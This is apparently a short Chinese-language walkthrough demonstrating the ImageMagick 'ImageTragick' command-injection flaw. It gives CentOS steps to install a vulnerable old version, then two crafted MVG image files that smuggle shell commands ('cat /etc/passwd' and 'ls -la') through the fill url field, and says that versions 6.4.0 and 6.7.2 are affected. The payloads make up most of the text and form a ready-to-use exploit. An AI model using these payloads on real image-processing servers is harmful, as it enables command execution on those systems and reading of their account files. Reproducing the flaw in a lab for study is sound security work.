ImageMagick漏洞演示

centos安装

wget http://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz

tar zvxf ImageMagick-6.4.0-0.tar.gz
cd ImageMagick-6.4.0-0
./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with-quantum-depth=8
make

make install

伪造图片，把下面的几行内容复制到记事本，然后改为图片名后缀。

注意url那里一定要https才行，后面的cat /etc/passwd是linux命令

push graphic-context

viewbox 0 0 640 480

fill 'url(https://www.vm129.com/a.jpg "|cat /etc/passwd ")'

pop graphic-context

下面这个是freebuf提供的例子，带参数的命令

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg "|ls "-la)'

pop graphic-context

执行

测试了两个版本6.4.0和6.7.2，都有bug